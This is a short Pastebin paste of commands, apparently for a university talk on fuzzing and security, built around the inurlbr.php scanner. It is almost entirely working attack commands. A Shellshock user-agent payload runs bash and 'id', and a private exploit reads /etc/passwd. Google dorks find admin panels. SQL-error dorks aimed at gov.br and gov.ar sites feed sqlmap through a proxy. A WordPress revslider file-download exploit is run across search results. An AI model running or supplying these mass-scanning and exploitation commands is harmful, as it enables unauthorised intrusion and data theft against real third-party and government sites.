Googleinurl

[COMANDOS] APRESENTAÇÃO/ Fuzzing e segurança - UNINOVE

Apr 8th, 2015
1,696
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. [+] Shellshock:
  2. set user-agent exploit;
  3. '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;{id}; echo END_CMD:;"'
  4.  
  5. - EXECUÇÃO + VALIDAÇÃO INTERNA:
  6. php inurlbr.php -o SHELLSHOCK_vull.txt -s vull.txt --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;{id}; echo END_CMD:;"' -t 2 -a 99887766555
  7.  
  8.  
  9. - EXECUÇÃO + XPL PRIV8:
  10. php inurlbr.php -o testarSHELLSHOCK.txt -s teste.txt --command-all 'php shellshock.php -t "_TARGETFULL_" -c "cat /etc/passwd"'
  11.  
  12.  
  13. [+] FIND PAGE:
  14. DORK: inurl:"/admin/index.php"
  15. php inurlbr.php --target 'www.geovisite.com' -s testes.txt -o url-list/adminpage.inurl -t 5
  16.  
  17. [+] SCAN ERROS SQLI
  18. DORK: (site:gov.br | site:gov.ar | site:org.br) & inurl:(id|new|noticia) & "SQL syntax;"
  19. php inurlbr.php --dork '(site:gov.br | site:gov.ar | site:org.br) & inurl:(id|new|noticia) & "SQL syntax;"' -s testes.txt --exploit-get "?'´0x27"
  20.  
  21.  
  22. [+] SCAN ERROS SQLI + sqlmap
  23. DORK: (site:gov.br | site:gov.ar | site:org.br) & inurl:(id|new|noticia) & "SQL syntax;"
  24. php inurlbr.php --dork '(site:gov.br | site:gov.ar | site:org.br) & inurl:(id|new|noticia) & "SQL syntax;"' -s testes.txt --exploit-get "?'´0x27" --command-all '../../sqlmap/./sqlmap.py -u "_TARGETFULL_" --dbs --proxy "http://localhost:8118"'
  25.  
  26.  
  27. [+] SCAN VULNS CMS WORDPRESS
  28. DORK: inurl:/admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"
  29. php inurlbr.php --dork 'inurl:/admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s teste.txt --command-all 'php exploitWPLFD.php _TARGET_'
RAW Paste Data